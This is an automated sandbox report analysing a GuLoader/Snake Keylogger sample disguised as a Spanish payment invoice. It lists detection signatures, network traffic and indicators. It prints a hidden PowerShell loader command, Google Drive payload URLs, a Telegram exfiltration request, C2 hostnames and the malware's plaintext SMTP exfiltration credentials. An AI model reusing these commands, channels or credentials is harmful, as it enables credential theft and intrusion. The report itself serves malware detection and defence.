Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
FACTURA DE PAGO.exe

Overview

General Information

Sample name:FACTURA DE PAGO.exe
Analysis ID:1538465
MD5:de02502f79bc183714a9dfe879831170
SHA1:c1fd975e0df663fd49e86ae1453d0ad3eccacea8
SHA256:9e3ef4dbb2d13139c75e1cbf855114111e6378fc518b7666f972442134d06718
Infos:

Detection

GuLoader, Snake Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Early bird code injection technique detected
Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected GuLoader
Yara detected Snake Keylogger
Yara detected Telegram RAT
AI detected suspicious sample
Found suspicious powershell code related to unpacking or dynamic code loading
Loading BitLocker PowerShell Module
Powershell drops PE file
Queues an APC in another process (thread injection)
Suspicious powershell command line found
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: Msiexec Initiated Connection
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer

Classification

  • System is w10x64
  • FACTURA DE PAGO.exe (PID: 7436 cmdline: "C:\Users\user\Desktop\FACTURA DE PAGO.exe" MD5: DE02502F79BC183714A9DFE879831170)
    • powershell.exe (PID: 7460 cmdline: "powershell.exe" -windowstyle hidden "$fkale=Get-Content -raw 'C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Udlaanslofterne\Incuss.Pen';$Humongous=$fkale.SubString(4177,3);.$Humongous($fkale)" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7468 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • msiexec.exe (PID: 7864 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
{"Exfil Mode": "SMTP", "Username": "administration@south-fruits.com", "Password": "Rajahsouthfruits5", "Host": "smtp.ionos.fr", "Port": "587", "Version": "4.4"}
SourceRuleDescriptionAuthorStrings
00000004.00000002.2931722428.0000000020F01000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
    00000004.00000002.2931722428.000000002100A000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000001.00000002.1914582277.0000000008D6C000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
        Process Memory Space: msiexec.exe PID: 7864JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          Process Memory Space: msiexec.exe PID: 7864JoeSecurity_TelegramRATYara detected Telegram RATJoe Security

            System Summary

            barindex
            Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 216.58.206.46, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 7864, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49736
            Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7460, TargetFilename: C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Kinna\FACTURA DE PAGO.exe
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" -windowstyle hidden "$fkale=Get-Content -raw 'C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Udlaanslofterne\Incuss.Pen';$Humongous=$fkale.SubString(4177,3);.$Humongous($fkale)", CommandLine: "powershell.exe" -windowstyle hidden "$fkale=Get-Content -raw 'C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Udlaanslofterne\Incuss.Pen';$Humongous=$fkale.SubString(4177,3);.$Humongous($fkale)", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\FACTURA DE PAGO.exe", ParentImage: C:\Users\user\Desktop\FACTURA DE PAGO.exe, ParentProcessId: 7436, ParentProcessName: FACTURA DE PAGO.exe, ProcessCommandLine: "powershell.exe" -windowstyle hidden "$fkale=Get-Content -raw 'C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Udlaanslofterne\Incuss.Pen';$Humongous=$fkale.SubString(4177,3);.$Humongous($fkale)", ProcessId: 7460, ProcessName: powershell.exe
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-10-21T11:16:54.926325+020028033053Unknown Traffic192.168.2.449740188.114.97.3443TCP
            2024-10-21T11:16:56.563306+020028033053Unknown Traffic192.168.2.449742188.114.97.3443TCP
            2024-10-21T11:16:58.201916+020028033053Unknown Traffic192.168.2.449744188.114.97.3443TCP
            2024-10-21T11:16:59.851756+020028033053Unknown Traffic192.168.2.449746188.114.97.3443TCP
            2024-10-21T11:17:01.461686+020028033053Unknown Traffic192.168.2.449748188.114.97.3443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-10-21T11:16:52.929125+020028032742Potentially Bad Traffic192.168.2.449738193.122.6.16880TCP
            2024-10-21T11:16:54.210380+020028032742Potentially Bad Traffic192.168.2.449738193.122.6.16880TCP
            2024-10-21T11:16:55.835397+020028032742Potentially Bad Traffic192.168.2.449741193.122.6.16880TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-10-21T11:16:46.535494+020028032702Potentially Bad Traffic192.168.2.449736216.58.206.46443TCP

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: 00000004.00000002.2931722428.0000000020F01000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "administration@south-fruits.com", "Password": "Rajahsouthfruits5", "Host": "smtp.ionos.fr", "Port": "587", "Version": "4.4"}
            Source: FACTURA DE PAGO.exeVirustotal: Detection: 20%Perma Link
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 95.2% probability

            Location Tracking

            barindex
            Source: unknownDNS query: name: reallyfreegeoip.org
            Source: FACTURA DE PAGO.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49739 version: TLS 1.0
            Source: unknownHTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.4:49736 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.250.186.33:443 -> 192.168.2.4:49737 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49755 version: TLS 1.2
            Source: FACTURA DE PAGO.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000001.00000002.1913479632.0000000008213000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: bqm.Core.pdbP source: powershell.exe, 00000001.00000002.1906039371.0000000006F03000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: mation.pdb source: powershell.exe, 00000001.00000002.1895923061.00000000008BF000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Core.pdb source: powershell.exe, 00000001.00000002.1895923061.00000000008BF000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Core.pdbk source: powershell.exe, 00000001.00000002.1895923061.00000000008BF000.00000004.00000020.00020000.00000000.sdmp
            Source: C:\Users\user\Desktop\FACTURA DE PAGO.exeCode function: 0_2_00406033 FindFirstFileA,FindClose,0_2_00406033
            Source: C:\Users\user\Desktop\FACTURA DE PAGO.exeCode function: 0_2_004055D1 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_004055D1
            Source: C:\Users\user\Desktop\FACTURA DE PAGO.exeCode function: 0_2_00402688 FindFirstFileA,0_2_00402688
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 20EEF45Dh4_2_20EEF2C0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 20EEF45Dh4_2_20EEF4AC
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then jmp 20EEFC19h4_2_20EEF974

            Networking

            barindex
            Source: unknownDNS query: name: api.telegram.org
            Source: global trafficHTTP traffic detected: GET /xml/155.94.241.186 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/155.94.241.186 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/155.94.241.186 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/155.94.241.186 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/155.94.241.186 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/155.94.241.186 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/155.94.241.186 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/155.94.241.186 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/155.94.241.186 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:971342%0D%0ADate%20and%20Time:%2021/10/2024%20/%2019:09:45%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20971342%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
            Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
            Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
            Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
            Source: Joe Sandbox ViewIP Address: 193.122.6.168 193.122.6.168
            Source: Joe Sandbox ViewASN Name: TELEGRAMRU TELEGRAMRU
            Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
            Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
            Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
            Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
            Source: unknownDNS query: name: checkip.dyndns.org
            Source: unknownDNS query: name: reallyfreegeoip.org
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49741 -> 193.122.6.168:80
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49738 -> 193.122.6.168:80
            Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49736 -> 216.58.206.46:443
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49742 -> 188.114.97.3:443
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49740 -> 188.114.97.3:443
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49748 -> 188.114.97.3:443
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49746 -> 188.114.97.3:443
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49744 -> 188.114.97.3:443
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1ZEribp6UWsv7328G3wN4qTd_6APeaRh2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /download?id=1ZEribp6UWsv7328G3wN4qTd_6APeaRh2&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49739 version: TLS 1.0
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1ZEribp6UWsv7328G3wN4qTd_6APeaRh2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /download?id=1ZEribp6UWsv7328G3wN4qTd_6APeaRh2&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/155.94.241.186 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/155.94.241.186 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/155.94.241.186 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/155.94.241.186 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/155.94.241.186 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/155.94.241.186 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/155.94.241.186 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/155.94.241.186 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/155.94.241.186 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:971342%0D%0ADate%20and%20Time:%2021/10/2024%20/%2019:09:45%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20971342%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: msiexec.exe, 00000004.00000003.1980553089.0000000005441000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: *.google.com*.appengine.google.com*.bdn.dev*.origin-test.bdn.dev*.cloud.google.com*.crowdsource.google.com*.datacompute.google.com*.google.ca*.google.cl*.google.co.in*.google.co.jp*.google.co.uk*.google.com.ar*.google.com.au*.google.com.br*.google.com.co*.google.com.mx*.google.com.tr*.google.com.vn*.google.de*.google.es*.google.fr*.google.hu*.google.it*.google.nl*.google.pl*.google.pt*.googleapis.cn*.googlevideo.com*.gstatic.cn*.gstatic-cn.comgooglecnapps.cn*.googlecnapps.cngoogleapps-cn.com*.googleapps-cn.comgkecnapps.cn*.gkecnapps.cngoogledownloads.cn*.googledownloads.cnrecaptcha.net.cn*.recaptcha.net.cnrecaptcha-cn.net*.recaptcha-cn.netwidevine.cn*.widevine.cnampproject.org.cn*.ampproject.org.cnampproject.net.cn*.ampproject.net.cngoogle-analytics-cn.com*.google-analytics-cn.comgoogleadservices-cn.com*.googleadservices-cn.comgooglevads-cn.com*.googlevads-cn.comgoogleapis-cn.com*.googleapis-cn.comgoogleoptimize-cn.com*.googleoptimize-cn.comdoubleclick-cn.net*.doubleclick-cn.net*.fls.doubleclick-cn.net*.g.doubleclick-cn.netdoubleclick.cn*.doubleclick.cn*.fls.doubleclick.cn*.g.doubleclick.cndartsearch-cn.net*.dartsearch-cn.netgoogletraveladservices-cn.com*.googletraveladservices-cn.comgoogletagservices-cn.com*.googletagservices-cn.comgoogletagmanager-cn.com*.googletagmanager-cn.comgooglesyndication-cn.com*.googlesyndication-cn.com*.safeframe.googlesyndication-cn.comapp-measurement-cn.com*.app-measurement-cn.comgvt1-cn.com*.gvt1-cn.comgvt2-cn.com*.gvt2-cn.com2mdn-cn.net*.2mdn-cn.netgoogleflights-cn.net*.googleflights-cn.netadmob-cn.com*.admob-cn.comgooglesandbox-cn.com*.googlesandbox-cn.com*.safenup.googlesandbox-cn.com*.gstatic.com*.metric.gstatic.com*.gvt1.com*.gcpcdn.gvt1.com*.gvt2.com*.gcp.gvt2.com*.url.google.com*.youtube-nocookie.com*.ytimg.comandroid.com*.android.com*.flash.android.comg.cn*.g.cng.co*.g.cogoo.glwww.goo.glgoogle-analytics.com*.google-analytics.comgoogle.comgooglecommerce.com*.googlecommerce.comggpht.cn*.ggpht.cnurchin.com*.urchin.comyoutu.beyoutube.com*.youtube.commusic.youtube.com*.music.youtube.comyoutubeeducation.com*.youtubeeducation.comyoutubekids.com*.youtubekids.comyt.be*.yt.beandroid.clients.google.com*.android.google.cn*.chrome.goo equals www.youtube.com (Youtube)
            Source: global trafficDNS traffic detected: DNS query: drive.google.com
            Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
            Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
            Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
            Source: global trafficDNS traffic detected: DNS query: api.telegram.org
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Mon, 21 Oct 2024 09:17:07 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
            Source: msiexec.exe, 00000004.00000002.2931722428.0000000020F01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://aborters.duckdns.org:8081
            Source: msiexec.exe, 00000004.00000002.2931722428.0000000020F01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anotherarmy.dns.army:8081
            Source: msiexec.exe, 00000004.00000002.2931722428.0000000020F01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
            Source: msiexec.exe, 00000004.00000002.2931722428.0000000020F01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
            Source: powershell.exe, 00000001.00000002.1906039371.0000000006EA1000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1906039371.0000000006F03000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro
            Source: FACTURA DE PAGO.exe, FACTURA DE PAGO.exe.1.drString found in binary or memory: http://nsis.sf.net/NSIS_Error
            Source: FACTURA DE PAGO.exe, FACTURA DE PAGO.exe.1.drString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
            Source: powershell.exe, 00000001.00000002.1899557466.0000000005ABC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
            Source: powershell.exe, 00000001.00000002.1896848086.0000000004BA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
            Source: powershell.exe, 00000001.00000002.1896848086.0000000004A51000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.2931722428.0000000020F01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: msiexec.exe, 00000004.00000002.2931722428.0000000020F01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://varders.kozow.com:8081
            Source: powershell.exe, 00000001.00000002.1896848086.0000000004BA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
            Source: powershell.exe, 00000001.00000002.1896848086.0000000004A51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
            Source: msiexec.exe, 00000004.00000002.2931722428.0000000020FE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
            Source: msiexec.exe, 00000004.00000002.2931722428.0000000020FE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
            Source: msiexec.exe, 00000004.00000002.2931722428.0000000020FE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
            Source: msiexec.exe, 00000004.00000002.2931722428.0000000020FE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:971342%0D%0ADate%20a
            Source: msiexec.exe, 00000004.00000003.1984367070.000000000540F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
            Source: msiexec.exe, 00000004.00000002.2931722428.00000000210C3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
            Source: msiexec.exe, 00000004.00000002.2931722428.00000000210BE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enlB
            Source: powershell.exe, 00000001.00000002.1899557466.0000000005ABC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
            Source: powershell.exe, 00000001.00000002.1899557466.0000000005ABC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
            Source: powershell.exe, 00000001.00000002.1899557466.0000000005ABC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
            Source: msiexec.exe, 00000004.00000002.2920754309.000000000539A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
            Source: msiexec.exe, 00000004.00000002.2920754309.000000000539A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/K
            Source: msiexec.exe, 00000004.00000002.2920754309.000000000539A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.2931153169.0000000020570000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1ZEribp6UWsv7328G3wN4qTd_6APeaRh2
            Source: msiexec.exe, 00000004.00000002.2920754309.000000000539A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1ZEribp6UWsv7328G3wN4qTd_6APeaRh2Y
            Source: msiexec.exe, 00000004.00000002.2920754309.000000000540A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000004.00000003.2034849572.000000000540A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
